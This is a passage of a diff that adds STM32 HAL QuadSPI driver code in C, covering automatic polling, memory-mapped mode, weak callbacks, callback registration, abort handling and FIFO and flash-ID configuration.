if(HAL_DMA_Start_IT(hqspi->hdma, (uint32_t)&hqspi->Instance->DR, (uint32_t)pData, hqspi->RxXferSize)== HAL_OK) + { + /* Configure QSPI: CCR register with functional as indirect read */ + MODIFY_REG(hqspi->Instance->CCR, QUADSPI_CCR_FMODE, QSPI_FUNCTIONAL_MODE_INDIRECT_READ); + + /* Start the transfer by re-writing the address in AR register */ + WRITE_REG(hqspi->Instance->AR, addr_reg); + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI transfer error Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TE); + + /* Enable the DMA transfer by setting the DMAEN bit in the QSPI CR register */ + SET_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + } + else + { + status = HAL_ERROR; + hqspi->ErrorCode |= HAL_QSPI_ERROR_DMA; + hqspi->State = HAL_QSPI_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } +#endif /* QSPI1_V2_1L */ + } + } + else + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_PARAM; + status = HAL_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + status = HAL_BUSY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + + return status; +} + +/** + * @brief Configure the QSPI Automatic Polling Mode in blocking mode. + * @param hqspi : QSPI handle + * @param cmd : structure that contains the command configuration information. + * @param cfg : structure that contains the polling configuration information. + * @param Timeout : Timeout duration + * @note This function is used only in Automatic Polling Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_AutoPolling(QSPI_HandleTypeDef *hqspi, QSPI_CommandTypeDef *cmd, QSPI_AutoPollingTypeDef *cfg, uint32_t Timeout) +{ + HAL_StatusTypeDef status; + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_QSPI_INSTRUCTION_MODE(cmd->InstructionMode)); + if (cmd->InstructionMode != QSPI_INSTRUCTION_NONE) + { + assert_param(IS_QSPI_INSTRUCTION(cmd->Instruction)); + } + + assert_param(IS_QSPI_ADDRESS_MODE(cmd->AddressMode)); + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + assert_param(IS_QSPI_ADDRESS_SIZE(cmd->AddressSize)); + } + + assert_param(IS_QSPI_ALTERNATE_BYTES_MODE(cmd->AlternateByteMode)); + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + assert_param(IS_QSPI_ALTERNATE_BYTES_SIZE(cmd->AlternateBytesSize)); + } + + assert_param(IS_QSPI_DUMMY_CYCLES(cmd->DummyCycles)); + assert_param(IS_QSPI_DATA_MODE(cmd->DataMode)); + + assert_param(IS_QSPI_DDR_MODE(cmd->DdrMode)); + assert_param(IS_QSPI_DDR_HHC(cmd->DdrHoldHalfCycle)); + assert_param(IS_QSPI_SIOO_MODE(cmd->SIOOMode)); + + assert_param(IS_QSPI_INTERVAL(cfg->Interval)); + assert_param(IS_QSPI_STATUS_BYTES_SIZE(cfg->StatusBytesSize)); + assert_param(IS_QSPI_MATCH_MODE(cfg->MatchMode)); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_AUTO_POLLING; + + /* Wait till BUSY flag reset */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_BUSY, RESET, tickstart, Timeout); + + if (status == HAL_OK) + { + /* Configure QSPI: PSMAR register with the status match value */ + WRITE_REG(hqspi->Instance->PSMAR, cfg->Match); + + /* Configure QSPI: PSMKR register with the status mask value */ + WRITE_REG(hqspi->Instance->PSMKR, cfg->Mask); + + /* Configure QSPI: PIR register with the interval value */ + WRITE_REG(hqspi->Instance->PIR, cfg->Interval); + + /* Configure QSPI: CR register with Match mode and Automatic stop enabled + (otherwise there will be an infinite loop in blocking mode) */ + MODIFY_REG(hqspi->Instance->CR, (QUADSPI_CR_PMM | QUADSPI_CR_APMS), + (cfg->MatchMode | QSPI_AUTOMATIC_STOP_ENABLE)); + + /* Call the configuration function */ + cmd->NbData = cfg->StatusBytesSize; + QSPI_Config(hqspi, cmd, QSPI_FUNCTIONAL_MODE_AUTO_POLLING); + + /* Wait until SM flag is set to go back in idle state */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_SM, SET, tickstart, Timeout); + + if (status == HAL_OK) + { + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_SM); + + /* Update state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + } + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Return function status */ + return status; +} + +/** + * @brief Configure the QSPI Automatic Polling Mode in non-blocking mode. + * @param hqspi : QSPI handle + * @param cmd : structure that contains the command configuration information. + * @param cfg : structure that contains the polling configuration information. + * @note This function is used only in Automatic Polling Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_AutoPolling_IT(QSPI_HandleTypeDef *hqspi, QSPI_CommandTypeDef *cmd, QSPI_AutoPollingTypeDef *cfg) +{ + HAL_StatusTypeDef status; + + /* Check the parameters */ + assert_param(IS_QSPI_INSTRUCTION_MODE(cmd->InstructionMode)); + if (cmd->InstructionMode != QSPI_INSTRUCTION_NONE) + { + assert_param(IS_QSPI_INSTRUCTION(cmd->Instruction)); + } + + assert_param(IS_QSPI_ADDRESS_MODE(cmd->AddressMode)); + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + assert_param(IS_QSPI_ADDRESS_SIZE(cmd->AddressSize)); + } + + assert_param(IS_QSPI_ALTERNATE_BYTES_MODE(cmd->AlternateByteMode)); + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + assert_param(IS_QSPI_ALTERNATE_BYTES_SIZE(cmd->AlternateBytesSize)); + } + + assert_param(IS_QSPI_DUMMY_CYCLES(cmd->DummyCycles)); + assert_param(IS_QSPI_DATA_MODE(cmd->DataMode)); + + assert_param(IS_QSPI_DDR_MODE(cmd->DdrMode)); + assert_param(IS_QSPI_DDR_HHC(cmd->DdrHoldHalfCycle)); + assert_param(IS_QSPI_SIOO_MODE(cmd->SIOOMode)); + + assert_param(IS_QSPI_INTERVAL(cfg->Interval)); + assert_param(IS_QSPI_STATUS_BYTES_SIZE(cfg->StatusBytesSize)); + assert_param(IS_QSPI_MATCH_MODE(cfg->MatchMode)); + assert_param(IS_QSPI_AUTOMATIC_STOP(cfg->AutomaticStop)); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_AUTO_POLLING; + + /* Wait till BUSY flag reset */ + status = QSPI_WaitFlagStateUntilTimeout_CPUCycle(hqspi, QSPI_FLAG_BUSY, RESET, hqspi->Timeout); + + if (status == HAL_OK) + { + /* Configure QSPI: PSMAR register with the status match value */ + WRITE_REG(hqspi->Instance->PSMAR, cfg->Match); + + /* Configure QSPI: PSMKR register with the status mask value */ + WRITE_REG(hqspi->Instance->PSMKR, cfg->Mask); + + /* Configure QSPI: PIR register with the interval value */ + WRITE_REG(hqspi->Instance->PIR, cfg->Interval); + + /* Configure QSPI: CR register with Match mode and Automatic stop mode */ + MODIFY_REG(hqspi->Instance->CR, (QUADSPI_CR_PMM | QUADSPI_CR_APMS), + (cfg->MatchMode | cfg->AutomaticStop)); + + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TE | QSPI_FLAG_SM); + + /* Call the configuration function */ + cmd->NbData = cfg->StatusBytesSize; + QSPI_Config(hqspi, cmd, QSPI_FUNCTIONAL_MODE_AUTO_POLLING); + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Enable the QSPI Transfer Error and status match Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, (QSPI_IT_SM | QSPI_IT_TE)); + + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + } + else + { + status = HAL_BUSY; + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + } + + /* Return function status */ + return status; +} + +/** + * @brief Configure the Memory Mapped mode. + * @param hqspi : QSPI handle + * @param cmd : structure that contains the command configuration information. + * @param cfg : structure that contains the memory mapped configuration information. + * @note This function is used only in Memory mapped Mode + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_MemoryMapped(QSPI_HandleTypeDef *hqspi, QSPI_CommandTypeDef *cmd, QSPI_MemoryMappedTypeDef *cfg) +{ + HAL_StatusTypeDef status; + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_QSPI_INSTRUCTION_MODE(cmd->InstructionMode)); + if (cmd->InstructionMode != QSPI_INSTRUCTION_NONE) + { + assert_param(IS_QSPI_INSTRUCTION(cmd->Instruction)); + } + + assert_param(IS_QSPI_ADDRESS_MODE(cmd->AddressMode)); + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + assert_param(IS_QSPI_ADDRESS_SIZE(cmd->AddressSize)); + } + + assert_param(IS_QSPI_ALTERNATE_BYTES_MODE(cmd->AlternateByteMode)); + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + assert_param(IS_QSPI_ALTERNATE_BYTES_SIZE(cmd->AlternateBytesSize)); + } + + assert_param(IS_QSPI_DUMMY_CYCLES(cmd->DummyCycles)); + assert_param(IS_QSPI_DATA_MODE(cmd->DataMode)); + + assert_param(IS_QSPI_DDR_MODE(cmd->DdrMode)); + assert_param(IS_QSPI_DDR_HHC(cmd->DdrHoldHalfCycle)); + assert_param(IS_QSPI_SIOO_MODE(cmd->SIOOMode)); + + assert_param(IS_QSPI_TIMEOUT_ACTIVATION(cfg->TimeOutActivation)); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + hqspi->ErrorCode = HAL_QSPI_ERROR_NONE; + + /* Update state */ + hqspi->State = HAL_QSPI_STATE_BUSY_MEM_MAPPED; + + /* Wait till BUSY flag reset */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_BUSY, RESET, tickstart, hqspi->Timeout); + + if (status == HAL_OK) + { + /* Configure QSPI: CR register with timeout counter enable */ + MODIFY_REG(hqspi->Instance->CR, QUADSPI_CR_TCEN, cfg->TimeOutActivation); + + if (cfg->TimeOutActivation == QSPI_TIMEOUT_COUNTER_ENABLE) + { + assert_param(IS_QSPI_TIMEOUT_PERIOD(cfg->TimeOutPeriod)); + + /* Configure QSPI: LPTR register with the low-power timeout value */ + WRITE_REG(hqspi->Instance->LPTR, cfg->TimeOutPeriod); + + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TO); + + /* Enable the QSPI TimeOut Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TO); + } + + /* Call the configuration function */ + QSPI_Config(hqspi, cmd, QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED); + } + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Return function status */ + return status; +} + +/** + * @brief Transfer Error callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_ErrorCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_QSPI_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief Abort completed callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_AbortCpltCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_QSPI_AbortCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Command completed callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_CmdCpltCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_QSPI_CmdCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_RxCpltCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_QSPI_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx Transfer completed callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_TxCpltCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_QSPI_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Half Transfer completed callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_RxHalfCpltCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_QSPI_RxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx Half Transfer completed callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_TxHalfCpltCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_QSPI_TxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief FIFO Threshold callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_FifoThresholdCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_QSPI_FIFOThresholdCallback could be implemented in the user file + */ +} + +/** + * @brief Status Match callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_StatusMatchCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_QSPI_StatusMatchCallback could be implemented in the user file + */ +} + +/** + * @brief Timeout callback. + * @param hqspi : QSPI handle + * @retval None + */ +__weak void HAL_QSPI_TimeOutCallback(QSPI_HandleTypeDef *hqspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hqspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_QSPI_TimeOutCallback could be implemented in the user file + */ +} +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User QSPI Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hqspi : QSPI handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_QSPI_ERROR_CB_ID QSPI Error Callback ID + * @arg @ref HAL_QSPI_ABORT_CB_ID QSPI Abort Callback ID + * @arg @ref HAL_QSPI_FIFO_THRESHOLD_CB_ID QSPI FIFO Threshold Callback ID + * @arg @ref HAL_QSPI_CMD_CPLT_CB_ID QSPI Command Complete Callback ID + * @arg @ref HAL_QSPI_RX_CPLT_CB_ID QSPI Rx Complete Callback ID + * @arg @ref HAL_QSPI_TX_CPLT_CB_ID QSPI Tx Complete Callback ID + * @arg @ref HAL_QSPI_RX_HALF_CPLT_CB_ID QSPI Rx Half Complete Callback ID + * @arg @ref HAL_QSPI_TX_HALF_CPLT_CB_ID QSPI Tx Half Complete Callback ID + * @arg @ref HAL_QSPI_STATUS_MATCH_CB_ID QSPI Status Match Callback ID + * @arg @ref HAL_QSPI_TIMEOUT_CB_ID QSPI Timeout Callback ID + * @arg @ref HAL_QSPI_MSP_INIT_CB_ID QSPI MspInit callback ID + * @arg @ref HAL_QSPI_MSP_DEINIT_CB_ID QSPI MspDeInit callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_QSPI_RegisterCallback (QSPI_HandleTypeDef *hqspi, HAL_QSPI_CallbackIDTypeDef CallbackId, pQSPI_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + switch (CallbackId) + { + case HAL_QSPI_ERROR_CB_ID : + hqspi->ErrorCallback = pCallback; + break; + case HAL_QSPI_ABORT_CB_ID : + hqspi->AbortCpltCallback = pCallback; + break; + case HAL_QSPI_FIFO_THRESHOLD_CB_ID : + hqspi->FifoThresholdCallback = pCallback; + break; + case HAL_QSPI_CMD_CPLT_CB_ID : + hqspi->CmdCpltCallback = pCallback; + break; + case HAL_QSPI_RX_CPLT_CB_ID : + hqspi->RxCpltCallback = pCallback; + break; + case HAL_QSPI_TX_CPLT_CB_ID : + hqspi->TxCpltCallback = pCallback; + break; + case HAL_QSPI_RX_HALF_CPLT_CB_ID : + hqspi->RxHalfCpltCallback = pCallback; + break; + case HAL_QSPI_TX_HALF_CPLT_CB_ID : + hqspi->TxHalfCpltCallback = pCallback; + break; + case HAL_QSPI_STATUS_MATCH_CB_ID : + hqspi->StatusMatchCallback = pCallback; + break; + case HAL_QSPI_TIMEOUT_CB_ID : + hqspi->TimeOutCallback = pCallback; + break; + case HAL_QSPI_MSP_INIT_CB_ID : + hqspi->MspInitCallback = pCallback; + break; + case HAL_QSPI_MSP_DEINIT_CB_ID : + hqspi->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hqspi->State == HAL_QSPI_STATE_RESET) + { + switch (CallbackId) + { + case HAL_QSPI_MSP_INIT_CB_ID : + hqspi->MspInitCallback = pCallback; + break; + case HAL_QSPI_MSP_DEINIT_CB_ID : + hqspi->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hqspi); + return status; +} + +/** + * @brief Unregister a User QSPI Callback + * QSPI Callback is redirected to the weak (surcharged) predefined callback + * @param hqspi : QSPI handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_QSPI_ERROR_CB_ID QSPI Error Callback ID + * @arg @ref HAL_QSPI_ABORT_CB_ID QSPI Abort Callback ID + * @arg @ref HAL_QSPI_FIFO_THRESHOLD_CB_ID QSPI FIFO Threshold Callback ID + * @arg @ref HAL_QSPI_CMD_CPLT_CB_ID QSPI Command Complete Callback ID + * @arg @ref HAL_QSPI_RX_CPLT_CB_ID QSPI Rx Complete Callback ID + * @arg @ref HAL_QSPI_TX_CPLT_CB_ID QSPI Tx Complete Callback ID + * @arg @ref HAL_QSPI_RX_HALF_CPLT_CB_ID QSPI Rx Half Complete Callback ID + * @arg @ref HAL_QSPI_TX_HALF_CPLT_CB_ID QSPI Tx Half Complete Callback ID + * @arg @ref HAL_QSPI_STATUS_MATCH_CB_ID QSPI Status Match Callback ID + * @arg @ref HAL_QSPI_TIMEOUT_CB_ID QSPI Timeout Callback ID + * @arg @ref HAL_QSPI_MSP_INIT_CB_ID QSPI MspInit callback ID + * @arg @ref HAL_QSPI_MSP_DEINIT_CB_ID QSPI MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_QSPI_UnRegisterCallback (QSPI_HandleTypeDef *hqspi, HAL_QSPI_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + switch (CallbackId) + { + case HAL_QSPI_ERROR_CB_ID : + hqspi->ErrorCallback = HAL_QSPI_ErrorCallback; + break; + case HAL_QSPI_ABORT_CB_ID : + hqspi->AbortCpltCallback = HAL_QSPI_AbortCpltCallback; + break; + case HAL_QSPI_FIFO_THRESHOLD_CB_ID : + hqspi->FifoThresholdCallback = HAL_QSPI_FifoThresholdCallback; + break; + case HAL_QSPI_CMD_CPLT_CB_ID : + hqspi->CmdCpltCallback = HAL_QSPI_CmdCpltCallback; + break; + case HAL_QSPI_RX_CPLT_CB_ID : + hqspi->RxCpltCallback = HAL_QSPI_RxCpltCallback; + break; + case HAL_QSPI_TX_CPLT_CB_ID : + hqspi->TxCpltCallback = HAL_QSPI_TxCpltCallback; + break; + case HAL_QSPI_RX_HALF_CPLT_CB_ID : + hqspi->RxHalfCpltCallback = HAL_QSPI_RxHalfCpltCallback; + break; + case HAL_QSPI_TX_HALF_CPLT_CB_ID : + hqspi->TxHalfCpltCallback = HAL_QSPI_TxHalfCpltCallback; + break; + case HAL_QSPI_STATUS_MATCH_CB_ID : + hqspi->StatusMatchCallback = HAL_QSPI_StatusMatchCallback; + break; + case HAL_QSPI_TIMEOUT_CB_ID : + hqspi->TimeOutCallback = HAL_QSPI_TimeOutCallback; + break; + case HAL_QSPI_MSP_INIT_CB_ID : + hqspi->MspInitCallback = HAL_QSPI_MspInit; + break; + case HAL_QSPI_MSP_DEINIT_CB_ID : + hqspi->MspDeInitCallback = HAL_QSPI_MspDeInit; + break; + default : + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hqspi->State == HAL_QSPI_STATE_RESET) + { + switch (CallbackId) + { + case HAL_QSPI_MSP_INIT_CB_ID : + hqspi->MspInitCallback = HAL_QSPI_MspInit; + break; + case HAL_QSPI_MSP_DEINIT_CB_ID : + hqspi->MspDeInitCallback = HAL_QSPI_MspDeInit; + break; + default : + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hqspi->ErrorCode |= HAL_QSPI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hqspi); + return status; +} +#endif + +/** + * @} + */ + +/** @defgroup QSPI_Exported_Functions_Group3 Peripheral Control and State functions + * @brief QSPI control and State functions + * +@verbatim + =============================================================================== + ##### Peripheral Control and State functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to : + (+) Check in run-time the state of the driver. + (+) Check the error code set during last operation. + (+) Abort any operation. + + +@endverbatim + * @{ + */ + +/** + * @brief Return the QSPI handle state. + * @param hqspi : QSPI handle + * @retval HAL state + */ +HAL_QSPI_StateTypeDef HAL_QSPI_GetState(QSPI_HandleTypeDef *hqspi) +{ + /* Return QSPI handle state */ + return hqspi->State; +} + +/** +* @brief Return the QSPI error code. +* @param hqspi : QSPI handle +* @retval QSPI Error Code +*/ +uint32_t HAL_QSPI_GetError(QSPI_HandleTypeDef *hqspi) +{ + return hqspi->ErrorCode; +} + +/** +* @brief Abort the current transmission. +* @param hqspi : QSPI handle +* @retval HAL status +*/ +HAL_StatusTypeDef HAL_QSPI_Abort(QSPI_HandleTypeDef *hqspi) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tickstart = HAL_GetTick(); + + /* Check if the state is in one of the busy states */ + if (((uint32_t)hqspi->State & 0x2U) != 0U) + { + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + if ((hqspi->Instance->CR & QUADSPI_CR_DMAEN) != 0U) + { + /* Disable the DMA transfer by clearing the DMAEN bit in the QSPI CR register */ + CLEAR_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Abort DMA channel */ + status = HAL_DMA_Abort(hqspi->hdma); + if(status != HAL_OK) + { + hqspi->ErrorCode |= HAL_QSPI_ERROR_DMA; + } + } + + /* Configure QSPI: CR register with Abort request */ + SET_BIT(hqspi->Instance->CR, QUADSPI_CR_ABORT); + + /* Wait until TC flag is set to go back in idle state */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_TC, SET, tickstart, hqspi->Timeout); + + if (status == HAL_OK) + { + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TC); + + /* Wait until BUSY flag is reset */ + status = QSPI_WaitFlagStateUntilTimeout(hqspi, QSPI_FLAG_BUSY, RESET, tickstart, hqspi->Timeout); + } + + if (status == HAL_OK) + { + /* Reset functional mode configuration to indirect write mode by default */ + CLEAR_BIT(hqspi->Instance->CCR, QUADSPI_CCR_FMODE); + + /* Update state */ + hqspi->State = HAL_QSPI_STATE_READY; + } + } + + return status; +} + +/** +* @brief Abort the current transmission (non-blocking function) +* @param hqspi : QSPI handle +* @retval HAL status +*/ +HAL_StatusTypeDef HAL_QSPI_Abort_IT(QSPI_HandleTypeDef *hqspi) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check if the state is in one of the busy states */ + if (((uint32_t)hqspi->State & 0x2U) != 0U) + { + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Update QSPI state */ + hqspi->State = HAL_QSPI_STATE_ABORT; + + /* Disable all interrupts */ + __HAL_QSPI_DISABLE_IT(hqspi, (QSPI_IT_TO | QSPI_IT_SM | QSPI_IT_FT | QSPI_IT_TC | QSPI_IT_TE)); + + if ((hqspi->Instance->CR & QUADSPI_CR_DMAEN) != 0U) + { + /* Disable the DMA transfer by clearing the DMAEN bit in the QSPI CR register */ + CLEAR_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Abort DMA channel */ + hqspi->hdma->XferAbortCallback = QSPI_DMAAbortCplt; + if (HAL_DMA_Abort_IT(hqspi->hdma) != HAL_OK) + { + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* Abort Complete callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->AbortCpltCallback(hqspi); +#else + HAL_QSPI_AbortCpltCallback(hqspi); +#endif + } + } + else + { + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TC); + + /* Enable the QSPI Transfer Complete Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TC); + + /* Configure QSPI: CR register with Abort request */ + SET_BIT(hqspi->Instance->CR, QUADSPI_CR_ABORT); + } + } + return status; +} + +/** @brief Set QSPI timeout. + * @param hqspi : QSPI handle. + * @param Timeout : Timeout for the QSPI memory access. + * @retval None + */ +void HAL_QSPI_SetTimeout(QSPI_HandleTypeDef *hqspi, uint32_t Timeout) +{ + hqspi->Timeout = Timeout; +} + +/** @brief Set QSPI Fifo threshold. + * @param hqspi : QSPI handle. + * @param Threshold : Threshold of the Fifo (value between 1 and 16). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_SetFifoThreshold(QSPI_HandleTypeDef *hqspi, uint32_t Threshold) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + /* Synchronize init structure with new FIFO threshold value */ + hqspi->Init.FifoThreshold = Threshold; + + /* Configure QSPI FIFO Threshold */ + MODIFY_REG(hqspi->Instance->CR, QUADSPI_CR_FTHRES, + ((hqspi->Init.FifoThreshold - 1U) << QUADSPI_CR_FTHRES_Pos)); + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Return function status */ + return status; +} + +/** @brief Get QSPI Fifo threshold. + * @param hqspi : QSPI handle. + * @retval Fifo threshold (value between 1 and 16) + */ +uint32_t HAL_QSPI_GetFifoThreshold(QSPI_HandleTypeDef *hqspi) +{ + return ((READ_BIT(hqspi->Instance->CR, QUADSPI_CR_FTHRES) >> QUADSPI_CR_FTHRES_Pos) + 1U); +} + +/** @brief Set FlashID. + * @param hqspi : QSPI handle. + * @param FlashID : Index of the flash memory to be accessed. + * This parameter can be a value of @ref QSPI_Flash_Select. + * @note The FlashID is ignored when dual flash mode is enabled. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_QSPI_SetFlashID(QSPI_HandleTypeDef *hqspi, uint32_t FlashID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameter */ + assert_param(IS_QSPI_FLASH_ID(FlashID)); + + /* Process locked */ + __HAL_LOCK(hqspi); + + if(hqspi->State == HAL_QSPI_STATE_READY) + { + /* Synchronize init structure with new FlashID value */ + hqspi->Init.FlashID = FlashID; + + /* Configure QSPI FlashID */ + MODIFY_REG(hqspi->Instance->CR, QUADSPI_CR_FSEL, FlashID); + } + else + { + status = HAL_BUSY; + } + + /* Process unlocked */ + __HAL_UNLOCK(hqspi); + + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @defgroup QSPI_Private_Functions QSPI Private Functions + * @{ + */ + +/** + * @brief DMA QSPI receive process complete callback. + * @param hdma : DMA handle + * @retval None + */ +static void QSPI_DMARxCplt(DMA_HandleTypeDef *hdma) +{ + QSPI_HandleTypeDef* hqspi = 